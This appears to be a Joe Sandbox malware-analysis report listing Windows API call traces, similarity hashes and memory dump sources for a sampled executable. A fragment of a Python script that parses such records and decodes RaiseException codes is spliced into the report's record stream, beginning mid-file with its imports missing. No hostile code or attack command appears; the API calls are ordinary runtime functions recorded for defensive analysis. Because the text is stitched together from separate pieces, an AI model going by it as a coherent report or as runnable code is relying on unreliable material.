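  • Part of subcall function 00E5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E5BA44,?), ref: 00E5B7E6
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E5BA89,?,00000000), ref: 00E5BC64
• GetCPInfo.KERNEL32(00000000,00E5BA89,?,?,?,00E5BA89,?,00000000), ref: 00E5BC77
Similarity
• API ID: CodeInfoPageValid
• String ID:
• Opcode ID: 767472a3ca6e4aca48421ea5febd5230199238c6429c4478dcc21645d56252a0
• Instruction ID: f2b2336cc556d75158d46ce165899f43a2bd1288f555e2fc0d55d1d33cf4b4ec
"""

RAISE_CODE = re.compile(r"RaiseException\.KERNEL32\(([0-9A-Fa-f]{8})")

# VcppException(sev, err) = sev | (FACILITY_VISUALCPP << 16) | err, as defined in delayimp.h.
FACILITY_VISUALCPP = 0x6D
WIN32_ERROR_NAMES = {0x57: "ERROR_INVALID_PARAMETER", 0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}


def parse_records(text):
    """One dict per function record; a new record starts at each 'APIs' line (assumed layout)."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": []}
            records.append(cur)
        elif cur is not None and line.startswith("•"):
            body = line[1:].strip()
            if " ref: " in body:           # an API call (direct or via subcall) with its code reference
                cur["apis"].append(body)
            elif ": " in body:             # a 'Key: value' attribute such as Opcode ID
                key, value = body.split(": ", 1)
                cur[key] = value
    return records


def group_by_instruction_id(records):
    """Map Instruction ID -> list of Opcode IDs; more than one Opcode ID means identical code."""
    groups = defaultdict(list)
    for r in records:
        if "Opcode ID" in r and "Instruction ID" in r:
            groups[r["Instruction ID"]].append(r["Opcode ID"])
    return dict(groups)


def shared_stubs(groups):
    return {iid: ops for iid, ops in groups.items() if len(ops) > 1}


def records_calling(records, api_name):
    """Opcode IDs of records whose API chain (including subcalls) mentions api_name."""
    return [r["Opcode ID"] for r in records if any(api_name in c for c in r["apis"])]


def raised_codes(records):
    """Distinct exception codes passed to RaiseException anywhere in the records."""
    codes = {int(m.group(1), 16) for r in records for c in r["apis"] for m in [RAISE_CODE.search(c)] if m}
    return sorted(codes)


def decode_vcpp_exception(code):
    """Split a VcppException value into severity (bits 31-30), facility (bits 27-16) and Win32 error."""
    severity, facility, err = code >> 30, (code >> 16) & 0xFFF, code & 0xFFFF
    return {
        "severity": "ERROR_SEVERITY_ERROR" if severity == 3 else f"severity_{severity}",
        "facility": "FACILITY_VISUALCPP" if facility == FACILITY_VISUALCPP else f"0x{facility:X}",
        "error": WIN32_ERROR_NAMES.get(err, f"0x{err:X}"),
    }


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for iid, ops in shared_stubs(group_by_instruction_id(recs)).items():
        print(f"Instruction ID {iid[:16]}... is shared by {len(ops)} Opcode IDs")
    for code in raised_codes(recs):
        print(f"RaiseException 0x{code:08X} -> {decode_vcpp_exception(code)}")
```

Run against the full report text instead of SAMPLE, the grouping shows how many of the listed functions collapse into a handful of compiler-generated thunks, which is worth knowing before spending analyst time on them; the exception decode shows that C06D0057 is the delay-load helper's error path (severity error, Visual C++ facility, ERROR_INVALID_PARAMETER) rather than malware-specific behaviour.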
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E39A50,?,?,00000000,?,?,00E38CBC,?), ref: 00E39BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00E38411,-00009570,00000000,000007F3), ref: 00E39BB6
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 5e0cffb0b70e23411a75b043c208942eebd4e930de094998a03c0e1dfac302c6
• Instruction ID: be7405311f9067cded8ece811f7ce424b7b7d3ca650a40c0dcd39ee4e3261ac6
• Opcode Fuzzy Hash: 5e0cffb0b70e23411a75b043c208942eebd4e930de094998a03c0e1dfac302c6
• Instruction Fuzzy Hash: 2F419D316043418FDB24DF25E5884AAFFE5FFD4324F159A2DE881A3262D7F0AD48CA59
APIs
• __EH_prolog.LIBCMT ref: 00E31E55
  • Part of subcall function 00E33BBA: __EH_prolog.LIBCMT ref: 00E33BBF
• _wcslen.LIBCMT ref: 00E31EFD
Similarity
• API ID: H_prolog$_wcslen
• String ID:
• API String ID: 2838827086-0
• Opcode ID: 5f1ac655e5c1888ac9eaf448aa30f01ac33fca869dc55f597100c466d75a48c8
• Instruction ID: a5f163281c63f7782e837e3058d1c201c9d61051c4bc411aee1ff016b7ef4b3a
• Opcode Fuzzy Hash: 5f1ac655e5c1888ac9eaf448aa30f01ac33fca869dc55f597100c466d75a48c8
• Instruction Fuzzy Hash: D2314871904209AFCF15DFA9D949AEEBBF6AF48304F1014AEE845B7251CB325E51CB60
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E373BC,?,?,?,00000000), ref: 00E39DBC
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00E39E70
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
• Opcode ID: 02c778537758c1aa197f641423748a3d13eade7c8ab297c4ee82703eb3c371ec
• Instruction ID: 2a7494265b61788e3ed32883b84b330928de35929b4c75870a6e5f4da27149c9
• Opcode Fuzzy Hash: 02c778537758c1aa197f641423748a3d13eade7c8ab297c4ee82703eb3c371ec
• Instruction Fuzzy Hash: 04210431248246AFC714DF75C89AAABBFE4AF55308F48585CF4C593142D368D90CCB61
APIs
• CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E39F27,?,?,00E3771A), ref: 00E396E6
• CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E39F27,?,?,00E3771A), ref: 00E39716
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ab233e33402941e0359e61d1eb386bac5178ba805289d847d17928565715e9ce
• Instruction ID: 10e2aa3d81b1e1bc3e71818680204d686a9f641a8870ce0bdfdc18b7436274df
• Opcode Fuzzy Hash: ab233e33402941e0359e61d1eb386bac5178ba805289d847d17928565715e9ce
• Instruction Fuzzy Hash: 1421C1715003446FE3708A65CC8EBE7BBDCEB49364F101A19FA96E25D2C7B4A884C631
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E39EC7
• GetLastError.KERNEL32 ref: 00E39ED4
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: fd4fa9719c356dabb24492cdd9a354d096dc48ac2a81ab67e31cc7f5efe61ca6
• Instruction ID: c03d5298bfa062cd2c2b27425abb71b72befa2c9a7ab72b93e1c6c31b1aed742
• Opcode Fuzzy Hash: fd4fa9719c356dabb24492cdd9a354d096dc48ac2a81ab67e31cc7f5efe61ca6
• Instruction Fuzzy Hash: 0711E131600700ABE724D63AC889BA6BBE9AB44374F605A69E153F26D1D7F0ED49C760
APIs
• _free.LIBCMT ref: 00E58E75
  • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
• HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00E71098,00E317CE,?,?,00000007,?,?,?,00E313D6,?,00000000), ref: 00E58EB1
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
• Opcode ID: 5e50af13764e8a7e97bb20750b4b55b45c3786f0550d67b3b0b2cdd845442c2d
• Instruction ID: 291b162f3ed3accb466ad1f6318cf4c32f381eccf0d5a6de0c6f67ed0d6d942d
• Opcode Fuzzy Hash: 5e50af13764e8a7e97bb20750b4b55b45c3786f0550d67b3b0b2cdd845442c2d
• Instruction Fuzzy Hash: EFF0FC322011156ACB312A266E07BAF37B88F81B73F142D16FD14B6192DF70CD0C85A0
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 00E410AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 00E410B2
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: 4166c2453fd0f5756a3c2e860064d718086a204408e5e6bd73a4578d3de7f3e3
• Instruction ID: 412bcbbbe90486b6f86013e258a989a34bee01b7d8d700fc2caec197919fe0bf
• Opcode Fuzzy Hash: 4166c2453fd0f5756a3c2e860064d718086a204408e5e6bd73a4578d3de7f3e3
• Instruction Fuzzy Hash: 63E0D872F00145ABCF0D87B5BC058EB73DDEB4424831051B5E403F3101F970DE854660
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A501
  • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A532
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
• Opcode ID: 16d89599cbe74d59fe1f8459a579c21c6dea981511b81fac4414e5cb187fd426
• Instruction ID: 02e7b44f90d25e059c57099f8c9d58527bf93839d84a007a05d1217943acb5a4
• Opcode Fuzzy Hash: 16d89599cbe74d59fe1f8459a579c21c6dea981511b81fac4414e5cb187fd426
• Instruction Fuzzy Hash: FAF0A0312001097BDF015F60EC45FDA3BACBB04385F488060B945E5160DB71CAD8DB10
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641,000000FF), ref: 00E3A1F1
  • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641), ref: 00E3A21F
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00E62641,000000FF), ref: 00E4ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00E62641,000000FF), ref: 00E4ACB5
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00E3A23A,?,00E3755C,?,?,?,?), ref: 00E3A254
                                                                                                                      • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E3A23A,?,00E3755C,?,?,?,?), ref: 00E3A280
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00E4DEEC
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00E4DF03
                                                                                                                      • Part of subcall function 00E4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                      • Part of subcall function 00E4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                      • Part of subcall function 00E4B568: IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                      • Part of subcall function 00E4B568: TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                      • Part of subcall function 00E4B568: DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E4A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E4A3E1
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E52BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E52BB5
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00E38289
  • Part of subcall function 00E313DC: __EH_prolog.LIBCMT ref: 00E313E1
  • Part of subcall function 00E3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E3A598
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog$CloseFind
• String ID:
• API String ID: 2506663941-0
APIs
• __EH_prolog.LIBCMT ref: 00E313E1
  • Part of subcall function 00E35E37: __EH_prolog.LIBCMT ref: 00E35E3C
  • Part of subcall function 00E3CE40: __EH_prolog.LIBCMT ref: 00E3CE45
  • Part of subcall function 00E3B505: __EH_prolog.LIBCMT ref: 00E3B50A
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00E313E1
  • Part of subcall function 00E35E37: __EH_prolog.LIBCMT ref: 00E35E3C
  • Part of subcall function 00E3CE40: __EH_prolog.LIBCMT ref: 00E3CE45
  • Part of subcall function 00E3B505: __EH_prolog.LIBCMT ref: 00E3B50A
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00E4B098
  • Part of subcall function 00E313DC: __EH_prolog.LIBCMT ref: 00E313E1
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00E5ACF8
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
  • Part of subcall function 00E5B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E59813,00000001,00000364,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E5B177
• _free.LIBCMT ref: 00E5C4E5
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: b16fdf9a5fee3a026c895a02243cc1aef1f44c85fa679ac100208717f243c15c
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: C20126722003056FE3318E659891D6AFBEDFB85331F251A2DE994A3281EA30A809C734
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E59813,00000001,00000364,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E5B177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 332cc426bd95658f21eda9c8d08722514c5e988f10413479b6e34d14de44251f
                                                                                                                    • Instruction ID: aeac56c6a8b074477d0355b2620fc2aa12b05de11906a6242cafea395d25c313
                                                                                                                    • Opcode Fuzzy Hash: 332cc426bd95658f21eda9c8d08722514c5e988f10413479b6e34d14de44251f
                                                                                                                    • Instruction Fuzzy Hash: 6FF0BB3250792477DBA15A72AE25B9F7788AB41762B146951FC08BA191CB20D90D86E0
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E53C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: cfdc8325269e73b15ccb71cb668ff04741b10302e114cf1d1621cf8c6582ef00
                                                                                                                    • Instruction ID: 162805daee37ca7ea8906e1e94136affdbaa64fbc2e69921097b22c7e07012b7
                                                                                                                    • Opcode Fuzzy Hash: cfdc8325269e73b15ccb71cb668ff04741b10302e114cf1d1621cf8c6582ef00
                                                                                                                    • Instruction Fuzzy Hash: 2CF0A7322042169F8F114EB9FC0099AB799EF01BA67105925FE05F7190DB31DA28C7B0
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 58d0afbdb4f454e329c71a823247a89640b3c3ca5aac697ccb9fe58e30070747
                                                                                                                    • Instruction ID: c53cbe51f8065715dee0caa1f2a9831cde56defeb504a61862c8ee0e45aded1c
                                                                                                                    • Opcode Fuzzy Hash: 58d0afbdb4f454e329c71a823247a89640b3c3ca5aac697ccb9fe58e30070747
                                                                                                                    • Instruction Fuzzy Hash: EFE0653120612556EA712666AE06B9F76A89B417AAF153911EC59B60A2DF60CC0881E1
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E35AC2
                                                                                                                      • Part of subcall function 00E3B505: __EH_prolog.LIBCMT ref: 00E3B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 5d3cf2180c0c1694ec0a09490aff35de1658b78e00296f59ad93553e25bf25f5
                                                                                                                    • Instruction ID: 7f3f28826b22f2f20d216572414fed640926bd3e8dcf0ceff90102cbebc15207
                                                                                                                    • Opcode Fuzzy Hash: 5d3cf2180c0c1694ec0a09490aff35de1658b78e00296f59ad93553e25bf25f5
                                                                                                                    • Instruction Fuzzy Hash: 8E018C30810690DED725EBB8E045BDDFBE4DF64304F51A49EA55773682CBB42B08D7A2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6C4
                                                                                                                      • Part of subcall function 00E3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6F2
                                                                                                                      • Part of subcall function 00E3A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E3A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    • Opcode ID: 6b03b85072d6071610bfe9f87106656b7b84853b414cf713e376380f1fb5ff2b
                                                                                                                    • Instruction ID: 6c29e3cc1c8be8f08cf9f689531c90b15aba8b22929e6b446a4a1fc45f0bea7a
                                                                                                                    • Opcode Fuzzy Hash: 6b03b85072d6071610bfe9f87106656b7b84853b414cf713e376380f1fb5ff2b
                                                                                                                    • Instruction Fuzzy Hash: A6F05E31008790AACB625BB48909BDB7FD06F1A321F089A4DF1F9621A6C27550D8DB23
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00E40E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
